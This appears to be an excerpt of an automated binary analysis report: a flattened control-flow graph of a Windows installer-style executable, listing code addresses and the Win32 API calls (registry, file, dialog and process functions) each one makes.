4409 40654f CloseHandle CharUpperW lstrcmpW 4408->4409 4408->4411 4409->4407 4409->4411 4412 406704 CloseHandle 4410->4412 4411->4397 4411->4408 4411->4409 4412->4410 4413->4403 4413->4412 4414->4403 4415->4400 4416->4387 4417->4390 4418 407752 4422 407344 4418->4422 4419 407c6d 4420 4073c2 GlobalFree 4421 4073cb GlobalAlloc 4420->4421 4421->4419 4421->4422 4422->4419 4422->4420 4422->4421 4422->4422 4423 407443 GlobalAlloc 4422->4423 4424 40743a GlobalFree 4422->4424 4423->4419 4423->4422 4424->4423 4425 401dd3 4426 401446 18 API calls 4425->4426 4427 401dda 4426->4427 4428 401446 18 API calls 4427->4428 4429 4018d3 4428->4429 4430 4028d3 RegCreateKeyExW 4431 4028e8 4430->4431 4435 4029ef 4430->4435 4432 402934 4431->4432 4434 40145c 18 API calls 4431->4434 4433 402963 4432->4433 4436 401446 18 API calls 4432->4436 4437 4029ae RegSetValueExW 4433->4437 4442 40337f 37 API calls 4433->4442 4438 4028fc lstrlenW 4434->4438 4441 402947 4436->4441 4439 4029c6 RegCloseKey 4437->4439 4440 4029cb 4437->4440 4443 402918 4438->4443 4444 40292a 4438->4444 4439->4435 4446 4062a3 11 API calls 4440->4446 4447 4062a3 11 API calls 4441->4447 4448 40297b 4442->4448 4449 4062a3 11 API calls 4443->4449 4445 4062a3 11 API calls 4444->4445 4445->4432 4446->4439 4447->4433 4455 406224 4448->4455 4450 402922 4449->4450 4450->4437 4454 4062a3 11 API calls 4454->4450 4456 406247 4455->4456 4457 40628a 4456->4457 4458 40625c wsprintfW 4456->4458 4459 402991 4457->4459 4460 406293 lstrcatW 4457->4460 4458->4457 4458->4458 4459->4454 4460->4459 4461 4040d3 4462 4040dd 4461->4462 4463 40410e 4462->4463 4476 403fca WideCharToMultiByte 4462->4476 4465 403d3f 19 API calls 4463->4465 4466 40414e 4465->4466 4467 403d3f 19 API calls 4466->4467 4468 40415b CheckDlgButton 4467->4468 4479 403d85 KiUserCallbackDispatcher 4468->4479 4470 404179 GetDlgItem 4480 403d98 SendMessageW 4470->4480 4472 40418f SendMessageW 4473 4041b5 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4472->4473 4474 
4041ac GetSysColor 4472->4474 4475 40435c 4473->4475 4474->4473 4477 404007 4476->4477 4478 403fe9 GlobalAlloc WideCharToMultiByte 4476->4478 4477->4463 4478->4477 4479->4470 4480->4472 4488 401cd5 4489 401446 18 API calls 4488->4489 4490 401cdd 4489->4490 4491 401446 18 API calls 4490->4491 4492 401ce8 4491->4492 4493 40145c 18 API calls 4492->4493 4494 401cf1 4493->4494 4495 401d07 lstrlenW 4494->4495 4500 401d43 4494->4500 4496 401d11 4495->4496 4496->4500 4501 406009 lstrcpynW 4496->4501 4498 401d2c 4499 401d39 lstrlenW 4498->4499 4498->4500 4499->4500 4501->4498 4502 403cd6 4503 403ce1 4502->4503 4504 403ce5 4503->4504 4505 403ce8 GlobalAlloc 4503->4505 4505->4504 4506 402cd7 4507 401446 18 API calls 4506->4507 4508 402c64 4507->4508 4508->4506 4509 402d99 4508->4509 4510 402d17 ReadFile 4508->4510 4510->4508 4511 402dd8 4512 4030e3 4511->4512 4513 402ddf 4511->4513 4514 402de5 FindClose 4513->4514 4514->4512 4515 401d5c 4516 40145c 18 API calls 4515->4516 4517 401d63 4516->4517 4518 40145c 18 API calls 4517->4518 4519 401d6c 4518->4519 4520 401d73 lstrcmpiW 4519->4520 4521 401d86 lstrcmpW 4519->4521 4522 401d79 4520->4522 4521->4522 4523 401c99 4521->4523 4522->4521 4522->4523 4207 407c5f 4209 407344 4207->4209 4208 407c6d 4209->4208 4210 4073c2 GlobalFree 4209->4210 4211 4073cb GlobalAlloc 4209->4211 4212 407443 GlobalAlloc 4209->4212 4213 40743a GlobalFree 4209->4213 4210->4211 4211->4208 4211->4209 4212->4208 4212->4209 4213->4212 4524 404363 4525 404373 4524->4525 4526 40439c 4524->4526 4527 403d3f 19 API calls 4525->4527 4528 403dca 8 API calls 4526->4528 4530 404380 SetDlgItemTextW 4527->4530 4529 4043a8 4528->4529 4530->4526 4531 4027e3 4532 4027e9 4531->4532 4533 4027f2 4532->4533 4534 402836 4532->4534 4547 401553 4533->4547 4536 40145c 18 API calls 4534->4536 4538 40283d 4536->4538 4537 4027f9 4540 40145c 18 API calls 4537->4540 4545 401a13 4537->4545 4539 4062a3 11 API calls 4538->4539 4541 40284d 4539->4541 4542 40280a RegDeleteValueW 4540->4542 
4551 40149d RegOpenKeyExW 4541->4551 4544 4062a3 11 API calls 4542->4544 4546 40282a RegCloseKey 4544->4546 4546->4545 4548 401563 4547->4548 4549 40145c 18 API calls 4548->4549 4550 401589 RegOpenKeyExW 4549->4550 4550->4537 4555 4014c9 4551->4555 4559 401515 4551->4559 4552 4014ef RegEnumKeyW 4553 401501 RegCloseKey 4552->4553 4552->4555 4556 4062fc 3 API calls 4553->4556 4554 401526 RegCloseKey 4554->4559 4555->4552 4555->4553 4555->4554 4557 40149d 3 API calls 4555->4557 4558 401511 4556->4558 4557->4555 4558->4559 4560 401541 RegDeleteKeyW 4558->4560 4559->4545 4560->4559 4561 403f64 4562 403f90 4561->4562 4563 403f74 4561->4563 4565 403fc3 4562->4565 4566 403f96 SHGetPathFromIDListW 4562->4566 4572 405c84 GetDlgItemTextW 4563->4572 4568 403fad SendMessageW 4566->4568 4569 403fa6 4566->4569 4567 403f81 SendMessageW 4567->4562 4568->4565 4570 40141d 80 API calls 4569->4570 4570->4568 4572->4567 4573 402ae4 4574 4030e3 4573->4574 4575 402aeb 4573->4575 4576 402af2 CloseHandle 4575->4576 4576->4574 4577 402065 4578 401446 18 API calls 4577->4578 4579 40206d 4578->4579 4580 401446 18 API calls 4579->4580 4581 402076 GetDlgItem 4580->4581 4582 4030dc 4581->4582 4583 4030e3 4582->4583 4585 405f51 wsprintfW 4582->4585 4585->4583 4586 402665 4587 40145c 18 API calls 4586->4587 4588 40266b 4587->4588 4589 40145c 18 API calls 4588->4589 4590 402674 4589->4590 4591 40145c 18 API calls 4590->4591 4592 40267d 4591->4592 4593 4062a3 11 API calls 4592->4593 4594 40268c 4593->4594 4595 4062d5 2 API calls 4594->4595 4596 402695 4595->4596 4597 4026a6 lstrlenW lstrlenW 4596->4597 4598 404f72 25 API calls 4596->4598 4601 4030e3 4596->4601 4599 404f72 25 API calls 4597->4599 4598->4596 4600 4026e8 SHFileOperationW 4599->4600 4600->4596 4600->4601 4609 401c69 4610 40145c 18 API calls 4609->4610 4611 401c70 4610->4611 4612 4062a3 11 API calls 4611->4612 4613 401c80 4612->4613 4614 405ca0 MessageBoxIndirectW 4613->4614 4615 401a13 4614->4615 4623 402f6e 4624 402f72 4623->4624 4625 
402fae 4623->4625 4626 4062a3 11 API calls 4624->4626 4627 40145c 18 API calls 4625->4627 4628 402f7d 4626->4628 4633 402f9d 4627->4633 4629 4062a3 11 API calls 4628->4629 4630 402f90 4629->4630 4631 402fa2 4630->4631 4632 402f98 4630->4632 4635 4060e7 9 API calls 4631->4635 4634 403e74 5 API calls 4632->4634 4634->4633 4635->4633 4636 4023f0 4637 402403 4636->4637 4651 4024da 4636->4651 4638 40145c 18 API calls 4637->4638 4640 40240a 4638->4640 4639 404f72 25 API calls 4645 4024f1 4639->4645 4641 40145c 18 API calls 4640->4641 4642 402413 4641->4642 4643 402429 LoadLibraryExW 4642->4643 4644 40241b GetModuleHandleW 4642->4644 4646 40243e 4643->4646 4647 4024ce 4643->4647 4644->4643 4644->4646 4660 406365 GlobalAlloc WideCharToMultiByte 4646->4660 4649 404f72 25 API calls 4647->4649 4649->4651 4650 402449 4652 40248c 4650->4652 4653 40244f 4650->4653 4651->4639 4654 404f72 25 API calls 4652->4654 4658 40245f 4653->4658 4663 401435 4653->4663 4656 402496 4654->4656 4657 4062a3 11 API calls 4656->4657 4657->4658 4658->4645 4659 4024c0 FreeLibrary 4658->4659 4659->4645 4661 406390 GetProcAddress 4660->4661 4662 40639d GlobalFree 4660->4662 4661->4662 4662->4650 4664 404f72 25 API calls 4663->4664 4665 401443 4664->4665 4665->4658 4666 402df3 4667 4019ec 4666->4667 4668 402dfa 4666->4668 4669 402e07 FindNextFileW 4668->4669 4669->4667 4670 402e16 4669->4670 4672 406009 lstrcpynW 4670->4672 4672->4667 4004 402175 4005 401446 18 API calls 4004->4005 4006 40217c 4005->4006 4007 401446 18 API calls 4006->4007 4008 402186 4007->4008 4009 402197 4008->4009 4010 4062a3 11 API calls 4008->4010 4011 4021aa EnableWindow 4009->4011 4012 40219f ShowWindow 4009->4012 4010->4009 4013 4030e3 4011->4013 4012->4013 4680 404077 4681 404081 4680->4681 4682 404084 lstrcpynW lstrlenW 4680->4682 4681->4682 4030 405479 4031 405491 4030->4031 4032 4055cd 4030->4032 4031->4032 4033 40549d 4031->4033 4034 40561e 4032->4034 4035 4055de GetDlgItem GetDlgItem 4032->4035 4036 4054a8 SetWindowPos 
4033->4036 4037 4054bb 4033->4037 4039 405678 4034->4039 4048 40139d 80 API calls 4034->4048 4038 403d3f 19 API calls 4035->4038 4036->4037 4041 4054c0 ShowWindow 4037->4041 4042 4054d8 4037->4042 4043 405608 SetClassLongW 4038->4043 4040 403daf SendMessageW 4039->4040 4044 4055c8 4039->4044 4070 40568a 4040->4070 4041->4042 4045 4054e0 DestroyWindow 4042->4045 4046 4054fa 4042->4046 4047 40141d 80 API calls 4043->4047 4049 4058dc 4045->4049 4050 405510 4046->4050 4051 4054ff SetWindowLongW 4046->4051 4047->4034 4052 405650 4048->4052 4049->4044 4059 40590d ShowWindow 4049->4059 4055 4055b9 4050->4055 4056 40551c GetDlgItem 4050->4056 4051->4044 4052->4039 4057 405654 SendMessageW 4052->4057 4053 40141d 80 API calls 4053->4070 4054 4058de DestroyWindow KiUserCallbackDispatcher 4054->4049 4109 403dca 4055->4109 4060 40554c 4056->4060 4061 40552f SendMessageW IsWindowEnabled 4056->4061 4057->4044 4059->4044 4063 405559 4060->4063 4064 4055a0 SendMessageW 4060->4064 4065 40556c 4060->4065 4074 405551 4060->4074 4061->4044 4061->4060 4062 406805 18 API calls 4062->4070 4063->4064 4063->4074 4064->4055 4067 405574 4065->4067 4068 405589 4065->4068 4071 40141d 80 API calls 4067->4071 4072 40141d 80 API calls 4068->4072 4069 405587 4069->4055 4070->4044 4070->4053 4070->4054 4070->4062 4073 403d3f 19 API calls 4070->4073 4091 40581e DestroyWindow 4070->4091 4100 403d3f 4070->4100 4071->4074 4075 405590 4072->4075 4073->4070 4106 403d18 4074->4106 4075->4055 4075->4074 4077 405705 GetDlgItem 4078 405723 ShowWindow KiUserCallbackDispatcher 4077->4078 4079 40571a 4077->4079 4103 403d85 KiUserCallbackDispatcher 4078->4103 4079->4078 4081 40574d EnableWindow 4084 405761 4081->4084 4082 405766 GetSystemMenu EnableMenuItem SendMessageW 4083 405796 SendMessageW 4082->4083 4082->4084 4083->4084 4084->4082 4104 403d98 SendMessageW 4084->4104 4105 406009 lstrcpynW 4084->4105 4087 4057c4 lstrlenW 4088 406805 18 API calls 4087->4088 4089 4057da SetWindowTextW 4088->4089 4090 40139d 80 
API calls 4089->4090 4090->4070 4091->4049 4092 405838 CreateDialogParamW 4091->4092 4092->4049 4093 40586b 4092->4093 4094 403d3f 19 API calls 4093->4094 4095 405876 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4094->4095 4096 40139d 80 API calls 4095->4096 4097 4058bc 4096->4097 4097->4044 4098 4058c4 ShowWindow 4097->4098 4099 403daf SendMessageW 4098->4099 4099->4049 4101 406805 18 API calls 4100->4101 4102 403d4a SetDlgItemTextW 4101->4102 4102->4077 4103->4081 4104->4084 4105->4087 4107 403d25 SendMessageW 4106->4107 4108 403d1f 4106->4108 4107->4069 4108->4107 4110 403ddf GetWindowLongW 4109->4110 4120 403e68 4109->4120 4111 403df0 4110->4111 4110->4120 4112 403e02 4111->4112 4113 403dff GetSysColor 4111->4113 4114 403e12 SetBkMode 4112->4114 4115 403e08 SetTextColor 4112->4115 4113->4112 4116 403e30 4114->4116 4117 403e2a GetSysColor 4114->4117 4115->4114 4118 403e41 4116->4118 4119 403e37 SetBkColor 4116->4119 4117->4116 4118->4120 4121 403e54 DeleteObject 4118->4121 4122 403e5b CreateBrushIndirect 4118->4122 4119->4118 4120->4044 4121->4122 4122->4120 4683 4020f9 GetDC GetDeviceCaps 4684 401446 18 API calls 4683->4684 4685 402116 MulDiv 4684->4685 4686 401446 18 API calls 4685->4686 4687 40212c 4686->4687 4688 406805 18 API calls 4687->4688 4689 402165 CreateFontIndirectW 4688->4689 4690 4030dc 4689->4690 4691 4030e3 4690->4691 4693 405f51 wsprintfW 4690->4693 4693->4691 4694 4024fb 4695 40145c 18 API calls 4694->4695 4696 402502 4695->4696 4697 40145c 18 API calls 4696->4697 4698 40250c 4697->4698 4699 40145c 18 API calls 4698->4699 4700 402515 4699->4700 4701 40145c 18 API calls 4700->4701 4702 40251f 4701->4702 4703 40145c 18 API calls 4702->4703 4704 402529 4703->4704 4705 40253d 4704->4705 4706 40145c 18 API calls 4704->4706 4707 4062a3 11 API calls 4705->4707 4706->4705 4708 40256a CoCreateInstance 4707->4708 4709 40258c 4708->4709 4710 40497c GetDlgItem GetDlgItem 4711 4049d2 7 API calls 4710->4711 4721 404bea 4710->4721 4712 404a76 
DeleteObject 4711->4712 4713 404a6a SendMessageW 4711->4713 4714 404a81 4712->4714 4713->4712 4716 404ab8 4714->4716 4718 406805 18 API calls 4714->4718 4715 404ccf 4717 404d74 4715->4717 4723 404bdd 4715->4723 4728 404d1e SendMessageW 4715->4728 4722 403d3f 19 API calls 4716->4722 4719 404d89 4717->4719 4720 404d7d SendMessageW 4717->4720 4725 404a9a SendMessageW SendMessageW 4718->4725 4730 404da2 4719->4730 4731 404d9b ImageList_Destroy 4719->4731 4739 404db2 4719->4739 4720->4719 4721->4715 4726 40484e 5 API calls 4721->4726 4742 404c5a 4721->4742 4727 404acc 4722->4727 4729 403dca 8 API calls 4723->4729 4724 404cc1 SendMessageW 4724->4715 4725->4714 4726->4742 4732 403d3f 19 API calls 4727->4732 4728->4723 4734 404d33 SendMessageW 4728->4734 4735 404f6b 4729->4735 4736 404dab GlobalFree 4730->4736 4730->4739 4731->4730 4745 404add 4732->4745 4733 404f1c 4733->4723 4740 404f31 ShowWindow GetDlgItem ShowWindow 4733->4740 4737 404d46 4734->4737 4736->4739 4747 404d57 SendMessageW 4737->4747 4738 404baa GetWindowLongW SetWindowLongW 4741 404bc4 4738->4741 4739->4733 4746 40141d 80 API calls 4739->4746 4757 404de4 4739->4757 4740->4723 4743 404be2 4741->4743 4744 404bca ShowWindow 4741->4744 4742->4715 4742->4724 4762 403d98 SendMessageW 4743->4762 4761 403d98 SendMessageW 4744->4761 4745->4738 4748 404ba4 4745->4748 4751 404b39 SendMessageW 4745->4751 4752 404b67 SendMessageW 4745->4752 4753 404b7b SendMessageW 4745->4753 4746->4757 4747->4717 4748->4738 4748->4741 4751->4745 4752->4745 4753->4745 4754 404ef3 InvalidateRect 4754->4733 4755 404f09 4754->4755 4763 4043ad 4755->4763 4756 404e12 SendMessageW 4760 404e28 4756->4760 4757->4756 4757->4760 4759 404ea1 SendMessageW SendMessageW 4759->4760 4760->4754 4760->4759 4761->4723 4762->4721 4764 4043cd 4763->4764 4765 406805 18 API calls 4764->4765 4766 40440d 4765->4766 4767 406805 18 API calls 4766->4767 4768 404418 4767->4768 4769 406805 18 API calls 4768->4769 4770 404428 lstrlenW wsprintfW SetDlgItemTextW 
4769->4770 4770->4733 4771 4026fc 4773 401ee4 4771->4773 4774 402708 4771->4774 4772 406805 18 API calls 4772->4773 4773->4771 4773->4772 4202 4019fd 4203 40145c 18 API calls 4202->4203 4204 401a04 4203->4204 4205 405e7f 2 API calls 4204->4205 4206 401a0b 4205->4206 4775 4022fd 4776 40145c 18 API calls 4775->4776 4777 402304 GetFileVersionInfoSizeW 4776->4777 4778 4030e3 4777->4778 4779 40232b GlobalAlloc 4777->4779 4779->4778 4780 40233f GetFileVersionInfoW 4779->4780 4781 402350 VerQueryValueW 4780->4781 4782 402381 GlobalFree 4780->4782 4781->4782 4783 402369 4781->4783 4782->4778 4788 405f51 wsprintfW 4783->4788 4786 402375 4789 405f51 wsprintfW 4786->4789 4788->4786 4789->4782 4790 402afd 4791 40145c 18 API calls 4790->4791 4792 402b04 4791->4792 4797 405e50 GetFileAttributesW CreateFileW 4792->4797 4794 402b10 4795 4030e3 4794->4795 4798 405f51 wsprintfW 4794->4798 4797->4794 4798->4795 4799 4029ff 4800 401553 19 API calls 4799->4800 4801 402a09 4800->4801 4802 40145c 18 API calls 4801->4802 4803 402a12 4802->4803 4804 402a1f RegQueryValueExW 4803->4804 4809 401a13 4803->4809 4805 402a45 4804->4805 4806 402a3f 4804->4806 4807 4029e4 RegCloseKey 4805->4807 4805->4809 4806->4805 4810 405f51 wsprintfW 4806->4810 4807->4809 4810->4805 4811 401000 4812 401037 BeginPaint GetClientRect 4811->4812 4813 40100c DefWindowProcW 4811->4813 4815 4010fc 4812->4815 4816 401182 4813->4816 4817 401073 CreateBrushIndirect FillRect DeleteObject 4815->4817 4818 401105 4815->4818 4817->4815 4819 401170 EndPaint 4818->4819 4820 40110b CreateFontIndirectW 4818->4820 4819->4816 4820->4819 4821 40111b 6 API calls 4820->4821 4821->4819 4822 401f80 4823 401446 18 API calls 4822->4823 4824 401f88 4823->4824 4825 401446 18 API calls 4824->4825 4826 401f93 4825->4826 4827 401fa3 4826->4827 4828 40145c 18 API calls 4826->4828 4829 401fb3 4827->4829 4830 40145c 18 API calls 4827->4830 4828->4827 4831 402006 4829->4831 4832 401fbc 4829->4832 4830->4829 4833 40145c 18 API calls 4831->4833 4834 
401446 18 API calls 4832->4834 4835 40200d 4833->4835 4836 401fc4 4834->4836 4838 40145c 18 API calls 4835->4838 4837 401446 18 API calls 4836->4837 4839 401fce 4837->4839 4840 402016 FindWindowExW 4838->4840 4841 401ff6 SendMessageW 4839->4841 4842 401fd8 SendMessageTimeoutW 4839->4842 4843 402036 4840->4843 4841->4843 4842->4843 4844 4030e3 4843->4844 4846 405f51 wsprintfW 4843->4846 4846->4844 4847 402082 4848 401446 18 API calls 4847->4848 4849 402093 SetWindowLongW 4848->4849 4850 4030e3 4849->4850 3389 403883 #17 SetErrorMode OleInitialize 3463 4062fc GetModuleHandleA 3389->3463 3393 4038f1 GetCommandLineW 3468 406009 lstrcpynW 3393->3468 3395 403903 GetModuleHandleW 3396 40391b 3395->3396 3469 405d06 3396->3469 3399 4039d6 3400 4039f5 GetTempPathW 3399->3400 3473 4037cc 3400->3473 3402 403a0b 3403 403a33 DeleteFileW 3402->3403 3404 403a0f GetWindowsDirectoryW lstrcatW 3402->3404 3481 403587 GetTickCount GetModuleFileNameW 3403->3481 3406 4037cc 11 API calls 3404->3406 3405 405d06 CharNextW 3408 40393c 3405->3408 3409 403a2b 3406->3409 3408->3399 3408->3405 3419 4039d8 3408->3419 3409->3403 3411 403acc 3409->3411 3410 403a47 3410->3411 3413 403ab1 3410->3413 3415 405d06 CharNextW 3410->3415 3566 403859 3411->3566 3509 40592c 3413->3509 3429 403a5e 3415->3429 3417 403ae1 3573 405ca0 3417->3573 3418 403bce 3423 403c51 3418->3423 3424 4062fc 3 API calls 3418->3424 3577 406009 lstrcpynW 3419->3577 3420 403ac1 3594 4060e7 3420->3594 3426 403bdd 3424->3426 3431 4062fc 3 API calls 3426->3431 3427 403af7 lstrcatW lstrcmpiW 3427->3411 3433 403b13 CreateDirectoryW SetCurrentDirectoryW 3427->3433 3428 403a89 3578 40677e 3428->3578 3429->3427 3429->3428 3434 403be6 3431->3434 3436 403b36 3433->3436 3437 403b2b 3433->3437 3438 4062fc 3 API calls 3434->3438 3608 406009 lstrcpynW 3436->3608 3607 406009 lstrcpynW 3437->3607 3441 403bef 3438->3441 3444 403c3d ExitWindowsEx 3441->3444 3450 403bfd GetCurrentProcess 3441->3450 3443 403b44 3609 406009 lstrcpynW 3443->3609 
3444->3423 3447 403c4a 3444->3447 3445 403aa6 3593 406009 lstrcpynW 3445->3593 3637 40141d 3447->3637 3453 403c0d 3450->3453 3453->3444 3454 403b79 CopyFileW 3460 403b53 3454->3460 3455 403bc2 3457 406c68 42 API calls 3455->3457 3458 403bc9 3457->3458 3458->3411 3459 406805 18 API calls 3459->3460 3460->3455 3460->3459 3462 403bad CloseHandle 3460->3462 3610 406805 3460->3610 3629 406c68 3460->3629 3634 405c3f CreateProcessW 3460->3634 3462->3460 3464 406314 LoadLibraryA 3463->3464 3465 40631f GetProcAddress 3463->3465 3464->3465 3466 4038c6 SHGetFileInfoW 3464->3466 3465->3466 3467 406009 lstrcpynW 3466->3467 3467->3393 3468->3395 3470 405d0c 3469->3470 3471 40392a CharNextW 3470->3471 3472 405d13 CharNextW 3470->3472 3471->3408 3472->3470 3640 406038 3473->3640 3475 4037e2 3475->3402 3476 4037d8 3476->3475 3649 406722 lstrlenW CharPrevW 3476->3649 3656 405e50 GetFileAttributesW CreateFileW 3481->3656 3483 4035c7 3503 4035d7 3483->3503 3657 406009 lstrcpynW 3483->3657 3485 4035ed 3658 406751 lstrlenW 3485->3658 3489 4035fe GetFileSize 3490 4036fa 3489->3490 3502 403615 3489->3502 3665 4032d2 3490->3665 3492 403703 3494 40373f GlobalAlloc 3492->3494 3492->3503 3699 403368 SetFilePointer 3492->3699 3676 403368 SetFilePointer 3494->3676 3496 4037bd 3499 4032d2 6 API calls 3496->3499 3498 403720 3501 403336 ReadFile 3498->3501 3499->3503 3500 40375a 3677 40337f 3500->3677 3505 40372b 3501->3505 3502->3490 3502->3496 3502->3503 3506 4032d2 6 API calls 3502->3506 3663 403336 ReadFile 3502->3663 3503->3410 3505->3494 3505->3503 3506->3502 3507 403766 3507->3503 3507->3507 3508 403794 SetFilePointer 3507->3508 3508->3503 3510 4062fc 3 API calls 3509->3510 3511 405940 3510->3511 3512 405946 3511->3512 3513 405958 3511->3513 3740 405f51 wsprintfW 3512->3740 3741 405ed3 RegOpenKeyExW 3513->3741 3517 4059a8 lstrcatW 3519 405956 3517->3519 3518 405ed3 3 API calls 3518->3517 3723 403e95 3519->3723 3522 40677e 18 API calls 3523 4059da 3522->3523 3524 405a70 3523->3524 3526 
405ed3 3 API calls 3523->3526 3525 40677e 18 API calls 3524->3525 3527 405a76 3525->3527 3528 405a0c 3526->3528 3529 405a86 3527->3529 3530 406805 18 API calls 3527->3530 3528->3524 3534 405a2f lstrlenW 3528->3534 3540 405d06 CharNextW 3528->3540 3531 405aa6 LoadImageW 3529->3531 3747 403e74 3529->3747 3530->3529 3532 405ad1 RegisterClassW 3531->3532 3533 405b66 3531->3533 3538 405b19 SystemParametersInfoW CreateWindowExW 3532->3538 3565 405b70 3532->3565 3539 40141d 80 API calls 3533->3539 3535 405a63 3534->3535 3536 405a3d lstrcmpiW 3534->3536 3543 406722 3 API calls 3535->3543 3536->3535 3541 405a4d GetFileAttributesW 3536->3541 3538->3533 3544 405b6c 3539->3544 3545 405a2a 3540->3545 3546 405a59 3541->3546 3542 405a9c 3542->3531 3547 405a69 3543->3547 3550 403e95 19 API calls 3544->3550 3544->3565 3545->3534 3546->3535 3548 406751 2 API calls 3546->3548 3746 406009 lstrcpynW 3547->3746 3548->3535 3551 405b7d 3550->3551 3552 405b89 ShowWindow LoadLibraryW 3551->3552 3553 405c0c 3551->3553 3555 405ba8 LoadLibraryW 3552->3555 3556 405baf GetClassInfoW 3552->3556 3732 405047 OleInitialize 3553->3732 3555->3556 3557 405bc3 GetClassInfoW RegisterClassW 3556->3557 3558 405bd9 DialogBoxParamW 3556->3558 3557->3558 3560 40141d 80 API calls 3558->3560 3559 405c12 3561 405c16 3559->3561 3562 405c2e 3559->3562 3560->3565 3564 40141d 80 API calls 3561->3564 3561->3565 3563 40141d 80 API calls 3562->3563 3563->3565 3564->3565 3565->3420 3567 403871 3566->3567 3568 403863 CloseHandle 3566->3568 3892 403c83 3567->3892 3568->3567 3574 405cb5 3573->3574 3575 403aef ExitProcess 3574->3575 3576 405ccb MessageBoxIndirectW 3574->3576 3576->3575 3577->3400 3949 406009 lstrcpynW 3578->3949 3580 40678f 3581 405d59 4 API calls 3580->3581 3582 406795 3581->3582 3583 406038 5 API calls 3582->3583 3590 403a97 3582->3590 3589 4067a5 3583->3589 3584 4067dd lstrlenW 3585 4067e4 3584->3585 3584->3589 3586 406722 3 API calls 3585->3586 3588 4067ea GetFileAttributesW 3586->3588 3587 4062d5 2 API 
calls 3587->3589 3588->3590 3589->3584 3589->3587 3589->3590 3591 406751 2 API calls 3589->3591 3590->3411 3592 406009 lstrcpynW 3590->3592 3591->3584 3592->3445 3593->3413 3595 4060f3 3594->3595 3598 406110 3594->3598 3596 4060fd CloseHandle 3595->3596 3597 406104 3595->3597 3596->3597 3597->3411 3598->3597 3599 406187 3598->3599 3600 40612d 3598->3600 3599->3597 3601 406190 lstrcatW lstrlenW WriteFile 3599->3601 3600->3601 3602 406136 GetFileAttributesW 3600->3602 3601->3597 3950 405e50 GetFileAttributesW CreateFileW 3602->3950 3604 406152 3604->3597 3605 406162 WriteFile 3604->3605 3606 40617c SetFilePointer 3604->3606 3605->3606 3606->3599 3607->3436 3608->3443 3609->3460 3612 406812 3610->3612 3611 406a7f 3613 403b6c DeleteFileW 3611->3613 3953 406009 lstrcpynW 3611->3953 3612->3611 3615 4068d3 GetVersion 3612->3615 3616 406a46 lstrlenW 3612->3616 3617 406805 10 API calls 3612->3617 3623 406038 5 API calls 3612->3623 3951 405f51 wsprintfW 3612->3951 3952 406009 lstrcpynW 3612->3952 3613->3454 3613->3460 3626 4068e0 3615->3626 3616->3612 3617->3616 3620 405ed3 3 API calls 3620->3626 3621 406952 GetSystemDirectoryW 3621->3626 3622 406965 GetWindowsDirectoryW 3622->3626 3623->3612 3624 406805 10 API calls 3624->3626 3625 4069df lstrcatW 3625->3612 3626->3612 3626->3620 3626->3621 3626->3622 3626->3624 3626->3625 3627 406999 SHGetSpecialFolderLocation 3626->3627 3627->3626 3628 4069b1 SHGetPathFromIDListW CoTaskMemFree 3627->3628 3628->3626 3630 4062fc 3 API calls 3629->3630 3631 406c6f 3630->3631 3633 406c90 3631->3633 3954 406a99 lstrcpyW 3631->3954 3633->3460 3635 405c7a 3634->3635 3636 405c6e CloseHandle 3634->3636 3635->3460 3636->3635 3638 40139d 80 API calls 3637->3638 3639 401432 3638->3639 3639->3423 3647 406045 3640->3647 3641 4060c1 CharPrevW 3645 4060bb 3641->3645 3642 4060ae CharNextW 3642->3645 3642->3647 3643 4060e1 3643->3476 3644 405d06 CharNextW 3644->3647 3645->3641 3645->3643 3646 40609a CharNextW 3646->3647 3647->3642 3647->3644 3647->3645 
3647->3646 3648 4060a9 CharNextW 3647->3648 3648->3642 3650 4037ea CreateDirectoryW 3649->3650 3651 40673f lstrcatW 3649->3651 3652 405e7f 3650->3652 3651->3650 3653 405e8c GetTickCount GetTempFileNameW 3652->3653 3654 405ec2 3653->3654 3655 4037fe 3653->3655 3654->3653 3654->3655 3655->3402 3656->3483 3657->3485 3659 406760 3658->3659 3660 4035f3 3659->3660 3661 406766 CharPrevW 3659->3661 3662 406009 lstrcpynW 3660->3662 3661->3659 3661->3660 3662->3489 3664 403357 3663->3664 3664->3502 3666 4032f3 3665->3666 3667 4032db 3665->3667 3670 403303 GetTickCount 3666->3670 3671 4032fb 3666->3671 3668 4032e4 DestroyWindow 3667->3668 3669 4032eb 3667->3669 3668->3669 3669->3492 3673 403311 CreateDialogParamW ShowWindow 3670->3673 3674 403334 3670->3674 3700 406332 3671->3700 3673->3674 3674->3492 3676->3500 3679 403398 3677->3679 3678 4033c3 3681 403336 ReadFile 3678->3681 3679->3678 3722 403368 SetFilePointer 3679->3722 3682 4033ce 3681->3682 3683 4033e7 GetTickCount 3682->3683 3684 403518 3682->3684 3686 4033d2 3682->3686 3696 4033fa 3683->3696 3685 40351c 3684->3685 3690 403540 3684->3690 3687 403336 ReadFile 3685->3687 3686->3507 3687->3686 3688 403336 ReadFile 3688->3690 3689 403336 ReadFile 3689->3696 3690->3686 3690->3688 3691 40355f WriteFile 3690->3691 3691->3686 3692 403574 3691->3692 3692->3686 3692->3690 3694 40345c GetTickCount 3694->3696 3695 403485 MulDiv wsprintfW 3711 404f72 3695->3711 3696->3686 3696->3689 3696->3694 3696->3695 3698 4034c9 WriteFile 3696->3698 3704 407312 3696->3704 3698->3686 3698->3696 3699->3498 3701 40634f PeekMessageW 3700->3701 3702 406345 DispatchMessageW 3701->3702 3703 403301 3701->3703 3702->3701 3703->3492 3705 407332 3704->3705 3706 40733a 3704->3706 3705->3696 3706->3705 3707 4073c2 GlobalFree 3706->3707 3708 4073cb GlobalAlloc 3706->3708 3709 407443 GlobalAlloc 3706->3709 3710 40743a GlobalFree 3706->3710 3707->3708 3708->3705 3708->3706 3709->3705 3709->3706 3710->3709 3712 404f8b 3711->3712 3717 40502f 3711->3717 3713 
                                                          [Control-flow graph edge list (node/edge numbers rendered as a graph in the original report) omitted]

                                                          Control-flow Graph (function 004050CD-0040529C … 00405474)
                                                          [graph edge list and Executed/Not Executed legend omitted; the APIs list below gives the calls this function makes]
                                                          APIs
                                                          • GetDlgItem.USER32(?,00000403), ref: 0040512F
                                                          • GetDlgItem.USER32(?,000003EE), ref: 0040513E
                                                          • GetClientRect.USER32(?,?), ref: 00405196
                                                          • GetSystemMetrics.USER32(00000015), ref: 0040519E
                                                          • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051BF
                                                          • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051D0
                                                          • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004051E3
